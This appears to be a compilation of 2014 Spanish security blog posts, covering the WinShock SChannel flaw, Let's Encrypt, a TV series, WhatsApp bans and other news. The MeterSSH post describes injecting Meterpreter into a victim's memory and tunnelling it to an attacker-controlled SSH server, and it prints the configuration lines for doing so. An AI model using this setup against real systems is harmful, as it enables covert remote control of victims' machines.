¿Sabes lo que le pasa a un sacerdote que cae en la tentación de las putas? Que termina en el averno. Y cada persona que se junta conmigo la aterrizo derechito ahí. Yo la verdad no estoy interesado en joder al mundo, aunque parezca totalmente lo contrario. Porque en primera yo no quiero ser una puta, y menos otras cosas digamos… malsanas, pero después del blackhat para mí no hay tantas profesiones disponibles. Al mismo tiempo, mi constante enfrentamiento con mi entorno es la prueba viva de que yo tengo no sé, ciertos talentos. Sé muy bien cómo deshacer a los hombres, cómo corromperlos y sobornarlos desde atrás de mi monitor. Pero todavía tengo que probar que puedo hacer todo eso, sin lana de por medio.
Te lo pongo sencillo: El demonio dentro de mí necesita probar su kryptonita. “No quiero” ser una puta ya lo había dicho, sino el villano, el super villano. Ser villano es mil veces preferible a ser puta, y con este corazón roto por los años ya no puedo ser otra cosa. Además con las habilidades que he desarrollado sólo puedo convertirme en dos cosas: villano o pendejo. Como soy mustio ogt, mala persona y diablito, no me puedo inscribir más que en el primer club.
No dudo que en tu mundo de florecitas, la noviecita, la casita y ponys rositas tengas muchísimas opciones, pero en la calle sólo hay una: survival. La tomas o la dejas…

(Charlando con un Gray Hat en la Campus Party 2014, Cómo hackear a una mujer, Zapopan Jalisco, México; Junio 2014, Seguridad/Redes). 

Halt and Catch Fire, una serie de TV sobre los pioneros de la informática

Lo reconozco, soy un friki, por las noches me dan las tantas viendo series mientras hago y deshago mil cosas con mi portátil. Hoy, mientras escribo ésto, tengo delante ya el segundo capítulo de la serie 'Halt and Catch Fire' (HCF), una serie ambientada en el Silicon Prairie de Texas de principios de los 80, inmersa en plena revolución del ordenador personal donde se libra una guerra por hacerse un hueco en esta industria prometedora pero copada desde el principio por IBM. Para que os hagáis una idea, al comienzo de la serie hacen una ingeniería inversa de la BIOS de uno de sus equipos y, evidentemente, no le hace nada de gracia al gigante azul...
 
Cameron, rebelde ciberpunk, representa a la hacker creativa
Sin duda se trata de un "Must-See" para todos los amantes de la informática, con ciertos tintes de la cultura hacker, muchas ganas de "cambiar el mundo" y muchas analogías con empresas que luchaban por emerger en aquella época como Xerox, Compaq... Apple ¿os suenan?, con referencias incluso a frases de Steve y creo que también con un inherente paralelismo a su reciente película... Jobs, sobretodo a la hora de resaltar la importancia de la innovación pero también la usabilidad del producto y la búsqueda de la atracción del usuario en una frenética carrera por imponerse en un feroz mercado. 

¿Podrán imponerse las ganas y el talento de unos pocos al inmenso poder del que ya lo controla (casi) todo? ¿Lograrán su hegemonía? La respuesta es historia pero, de momento, la primera temporada de serie de 10 episodios ha tenido bastante aceptación y AMC ya ha aprobado la grabación de la segunda.

http://es.wikipedia.org/wiki/Halt_and_Catch_Fire_%28serie_de_televisi%C3%B3n%29

Y para los verdaderos curiosos: HCF se refiere a una instrucción en código máquina no documentada e incluida en el procesador con propósitos de prueba, con efectos secundarios poco habituales, normalmente la inutilización del sistema por una condición de carrera. 


http://es.wikipedia.org/wiki/Halt_and_Catch_Fire

Let’s Encrypt: Nace la CA libre para generar certificados HTTPS gratis y automáticamente

Información vital personal y de negocios fluye a través de Internet con más frecuencia que nunca, y no siempre sabemos cuando está sucediendo. Está claro que en este punto el cifrado es algo que todos nosotros deberíamos estar haciendo. Entonces, ¿por qué no usamos TLS (el sucesor de SSL) en todas partes? Cada navegador en cada dispositivo lo soporta. Cada servidor en cada centro de datos lo soporta. ¿Por qué no acabamos de empezar a utilizarlo?

El reto está en los certificados de servidor. La base para cualquier comunicación protegida con TLS es un certificado de clave pública que demuestra que el servidor al que estás hablando es en realidad el servidor con el que tratabas de hablar. Para muchos operadores de servidores, conseguir un certificado de servidor básico es simplemente demasiada molestia. El proceso de solicitud puede ser confuso, por lo general cuesta dinero, es difícil de instalar correctamente y, en general, es un dolor de cabeza actualizar.

Let’s Encrypt es una nueva autoridad de certificación libre, construida sobre una base de cooperación y apertura, que permite a todos estar en funcionamiento con certificados de servidor básicos para sus dominios a través de un sencillo proceso de un solo clic.

Mozilla Corporation, Cisco Systems, Inc., Akamai Technologies, Electronic Frontier Foundation, IdenTrust, Inc., y los investigadores de la Universidad de Michigan están trabajando a través del Grupo de Investigación de Seguridad de Internet ("ISRG"), una corporación de beneficio público de California, para entregar esta infraestructura tan necesaria en el Q2 de 2015. El ISRG dará también la bienvenida a otras organizaciones que compartan el mismo ideal, la seguridad en Internet abierta.

Los principios clave detrás de Let’s Encrypt son:

- Libre: Cualquier persona que posea un dominio puede obtener un certificado validado para ese dominio a coste cero.
- Automático: El proceso de inscripción para todos los certificados se produce fácilmente durante el proceso de instalación o configuración nativa del servidor, mientras que la renovación se produce de forma automática en segundo plano.
- Seguro: Let’s Encrypt servirá como una plataforma para la implementación de técnicas modernas de seguridad y buenas prácticas.
- Transparente: Todos los registros de emisión y revocación de certificados estarán a disposición de cualquier persona que desee revisarlo.
- Abierto: El protocolo de emisión y renovación automática será un estándar abierto y el software será de código abierto en la medida de lo posible.
- Cooperativa: Al igual que los propios protocolos de Internet subyacentes, Let’s Encrypt es un esfuerzo conjunto para beneficiar a toda la comunidad, más allá del control de cualquier organización.

Si quieres ayudar a estas organizaciones en hacer realidad la implementación de TLS en todas partes, así es como puedes participar:

     Patrocinador ISRG
     Ayuda a construir Let’s Encrypt

Más información en: https://letsencrypt.org/about/

Grave RCE en SChannel de Windows aka #WinShock

Hace unos días en Pastebin avisaban de que, si el viernes 14 de noviembre Micro$oft no categorizaba la vulnerabilidad MS14-066 / CVE-2014-6321 como un 0-day, se iba a publicar el exploit del llamado #WinShock o "SChannel Shenanigans", una vulnerabilidad grave que:

- puede explotarse antes de cualquier autenticación, en métodos que se llaman al principio por muchas, muchas aplicaciones, bibliotecas y servicios.
- siempre acaba con los privilegios de SYSTEM, de forma local o remota. Un exploit para "Modo Dios" con 100% de éxito.
- puede utilizarse de varias maneras y el código defectuoso está muy expuesto. Todo, incluyendo Windows 2000 en adelante es vulnerable.
- el código heredado se ejecuta siempre. Esto significa que las protecciones modernas como EMET no funcionan.

Concretamente el problema vuelve estar en la implementación de SSL y TLS, esta vez por Microsoft que lo hace mediante Secure Channel, también conocido como Schannel, que permite la ejecución remota de código al procesar paquetes especialmente modificados.
Finalmente la vulnerabilidad fue clasificada con una criticidad de 10.0 en la escala CVSS (CVE-2014-6321) y Microsoft tuvo que publicar un workaround y una actualización crítica para solucionarlo pero, ¿parchearán todos los sistemas Windows antes de ser atacados?... es una pregunta retórica... *muac* *muac* ^_^

Go, go, empieza la carrera... podéis encontrar un gran detalle técnico en la entrada del blog BeyondTrust y, como dice el autor, "se deja como ejercicio para el lector un análisis más detallado y la explotación" ;)

pd. Impacientes, ya tenéis una PoC de Immunity Inc para Canvas

MeterSSH: Meterpreter sobre SSH

MeterSSH de TrustedSec es una manera fácil de inyectar código shell nativo en memoria y llevarlo al atacante a través de un túnel SSH. Todo con un único fichero Python que se puede convertir fácilmente en ejecutable usando PyInstaller o py2exe.

Sólo hay que editar el archivo meterssh.py y añadir la IP del servidor SSH, el puerto, el nombre de usuario y la contraseña:

user = “sshuser”
# password for SSH
password = “sshpw”
# this is where your SSH server is running
rhost = “192.168.1.1”
# remote SSH port – this is the attackers SSH server
port = “22”


Al ejecutarlo en la máquina de la víctima se lanzará un meterpreter mediante inyección en memoria (en este caso windows/meterpreter/bind_tcp) y lo asociará al puerto 8021 tunelizándolo con el módulo ssh Paramiko:



Después en el servidor del atacante ejecutaremos monitor.py para
supervisar la conexión SSH y el shell hasta iniciar automáticamente Metasploit:



Puedes descargar meterssh de la página de Github:

https://github.com/trustedsec/meterssh

Razones por las que WhatsApp puede prohibirte su uso

Hoy me ha llamado la atención un post de Panda en el que hablaban de las razones por las que WhatsApp puede prohibir el uso de su servicio y, sobretodo, cómo puede saber si uno de sus usuarios ha violado ciertos términos y condiciones de uso para hacerlo. Véase:

- Haber sido bloqueado por un cierto número de usuarios
- Enviar mensajes de cadena
- Utilizar la plataforma para fines publicitarios
- Compartir material obsceno o ilícito
- Difundir archivos con virus
- Hacerse pasar por otra persona

Yo ya he infringido más de una... Xd pero, ¿cómo puede comprobar WhatsApp que estás infringiendo algunas de estas condiciones si no accede a tus conversaciones? ¿no se supone que son privadas?


pd. Si alguno ha sido o conoce a alguien que ha sido banneado por WhatsApp qué comparta su experiencia ;)

Fuentes:
- Reasons you can be kicked out of WhatsApp
- FAQ Why am I seeing the message "Your number is no longer allowed to use our service"?
- FAQ Why am I seeing the message “You’re temporarily banned from WhatsApp"?
- WhatsApp Legal Info - Terms of Service

Cataluña en ciberguerra...

El president de la Generalitat, Artur Mas, ha denunciado en rueda de prensa los ataques cibernéticos a la red de información del Govern durante la jornada del 9-N, "que pusieron en riesgo las redes del sistema sanitario y otros servicios básicos".

La 'guerra' de Cataluña tiene también lugar en el frente cibernético. En la mañana de el pasado sábado, poco después de que los colegios electorales hubiesen abierto sus puertas para la consulta catalana, las centralitas de varias comisarías de los Mossos d’Esquadra quedaron inundadas de llamadas y colapsadas. Nadie contestaba al otro lado de la línea. Pero todas las llamadas pertenecían a un número de teléfono concreto: era de Òmnium Cultural.

Evidentemente, esta entidad cívica, que es una de las impulsoras de el referéndum catalán , no tenía nada que ver con el asunto, pero la anécdota implica que alguien con amplios conocimientos, le había intervenido una línea de teléfono y la había hecho servir. “Para realizar un acto así se necesita una cierta logística. El tema no deja de ser una cierta gamberrada, pero también un aviso”.

La "ciberguerra" contra el cáncer recibe un nuevo impulso

Hace dos años, el Profesor Eshel Ben-Jacob, de la Escuela de Física y Astronomía y el Centro de la Universidad Rice de Física Biológica Teórica de la Universidad de Tel Aviv, hizo el sorprendente descubrimiento de que el cáncer, al igual que un hacker enemigo en el ciberespacio, se dirige a la red de comunicaciones del cuerpo para infligir daños generalizados en todo el sistema. Encontró que el cáncer poseía rasgos especiales para el comportamiento cooperativo y utiliza la comunicación intrínseca para distribuir las tareas, compartir recursos y tomar decisiones.

En una investigación publicada en la edición temprana de las Actas de la Academia Nacional de Ciencias, el Profesor Ben-Jacob e investigadores de la Universidad de Rice y el Centro de Cáncer MD Anderson de la Universidad de Texas, el principal centro de tratamiento del cáncer en los EE.UU., ofrecen una nueva visión de la interacción letal entre las células cancerosas y la red de comunicaciones del sistema inmunológico. Ben-Jacob y los co-autores del estudio desarrollaron un programa informático que modela un canal específico de comunicación de célula a célula que implica exosomas (nanotransportadores con "inteligencia" fundamental celular) que tanto el cáncer y las células inmunes aprovechan para comunicarse con otras células.

"Investigaciones recientes han encontrado que el cáncer ya es experto en el uso de una especie de "guerra cibernética" contra el sistema inmune. Se estudió la interacción entre el cáncer y el sistema inmunológico para ver cómo podríamos ser capaces de inclinar la balanza contra el cáncer", dijo el profesor, señalando la diferencia entre lo innato y las cualidades de adaptación del sistema inmunológico. "En el principio, el cáncer es inhibido por la inmunidad innata del cuerpo. Pero una vez que el cáncer se escapa de la inmunidad, hay una carrera entre la progresión del cáncer y la capacidad del sistema inmune adaptativo para reconocer y actuar en contra de el."